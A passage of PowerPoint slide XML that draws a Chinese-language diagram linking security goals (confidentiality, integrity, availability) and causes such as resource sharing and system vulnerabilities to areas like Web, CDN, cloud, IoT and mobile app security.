                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56BE18C6-384B-6746-8136-0ADD2589DE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10147528" y="2577979"/>
            <a:ext cx="1633439" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="877888" eaLnBrk="0" hangingPunct="0">
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC1EC7C4-E997-BE4D-A6FC-5F3504C7C78F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10147528" y="3270132"/>
            <a:ext cx="1633439" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="877888" eaLnBrk="0" hangingPunct="0">
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>社交网络安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C027BC2A-A239-0D48-8D59-898C261D6D64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10147528" y="3962285"/>
            <a:ext cx="1633439" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="877888" eaLnBrk="0" hangingPunct="0">
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>云计算安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57E93466-38B0-C143-89D1-96D40E8F0BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10147528" y="4654438"/>
            <a:ext cx="1633439" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="877888" eaLnBrk="0" hangingPunct="0">
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>物联网安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75202EE2-4C90-3C41-AA0F-9371506FEBD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10147528" y="5346590"/>
            <a:ext cx="1633439" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="877888" eaLnBrk="0" hangingPunct="0">
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>移动应用安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">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932132EA-52B7-814F-A868-6E197A3E59F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7835290" y="2955887"/>
            <a:ext cx="1633439" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="877888" eaLnBrk="0" hangingPunct="0">
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>机密性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F070D4E-20CE-7848-BC27-E9B3C29CCA6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7828779" y="3590374"/>
            <a:ext cx="1633439" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="877888" eaLnBrk="0" hangingPunct="0">
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>完整性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B39D6DE-35B3-034D-B09C-453B14C8D520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7835290" y="4220139"/>
            <a:ext cx="1633439" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="877888" eaLnBrk="0" hangingPunct="0">
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可用性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直接连接符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{595BF74E-601B-954A-92E6-67852F952C45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="3"/>
            <a:endCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9468729" y="2070492"/>
            <a:ext cx="678799" cy="1070061"/>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17" name="直接连接符 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1A9F02E-8217-9E4A-A745-D7C232BD8500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="3"/>
            <a:endCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9468729" y="3140553"/>
            <a:ext cx="678799" cy="314245"/>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18" name="直接连接符 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FC7647B-9DD1-5D40-BDD9-A9E045ECC1DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="3"/>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9468729" y="3140553"/>
            <a:ext cx="678799" cy="1006398"/>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19" name="直接连接符 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AA6BFB0-68B1-3041-93E8-7D8EC644AD9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="3"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9468729" y="3140553"/>
            <a:ext cx="678799" cy="1698551"/>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20" name="直接连接符 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{930B7DB5-EAE9-3545-9E23-53F4D34EBA24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="3"/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9468729" y="3140553"/>
            <a:ext cx="678799" cy="2390703"/>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21" name="直接连接符 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07BB5003-6610-0840-913F-DA0942415743}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="3"/>
            <a:endCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9462218" y="2070492"/>
            <a:ext cx="685310" cy="1704548"/>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22" name="直接连接符 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D3ED80F-1548-C540-96EB-E042E98EAED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="3"/>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9462218" y="3775040"/>
            <a:ext cx="685310" cy="371911"/>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23" name="直接连接符 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DF2E8F3-B873-BF44-A16E-50593994DE41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="3"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9468729" y="4404805"/>
            <a:ext cx="678799" cy="434299"/>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24" name="直接连接符 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2EDAC39-4E57-E049-BEEE-13445F28ABF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="3"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9468729" y="2762645"/>
            <a:ext cx="678799" cy="1642160"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100"/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB0D6861-BBFE-EA49-81A9-6181B21F2679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5323980" y="2959483"/>
            <a:ext cx="1633439" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="877888" eaLnBrk="0" hangingPunct="0">
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>资源共享</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="矩形 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36327766-7DB1-B24E-850F-0DA8D577153C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5323979" y="3590374"/>
            <a:ext cx="1633439" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="877888" eaLnBrk="0" hangingPunct="0">
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>资源有限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="矩形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0155DBA6-9CBD-6B45-A9C7-DD594545523E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5323979" y="4206962"/>
            <a:ext cx="1633439" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="877888" eaLnBrk="0" hangingPunct="0">
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>系统漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="直接连接符 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DF0A42A-1097-F542-A908-F6186B2D6D13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7588406" y="3742688"/>
            <a:ext cx="246884" cy="662117"/>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36" name="直接连接符 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DFF71BC-E23D-8A43-B3AD-B43CB57DCF79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="14" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7588406" y="3742688"/>
            <a:ext cx="240373" cy="32352"/>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39" name="直接连接符 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660B0AAC-FACD-9C4B-A9A9-263D32166B9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7588406" y="3140553"/>
            <a:ext cx="246884" cy="602135"/>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42" name="直接连接符 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{378B26B3-8AFF-2845-A942-0D135DC0B668}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="1"/>
            <a:endCxn id="28" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6957419" y="3144149"/>
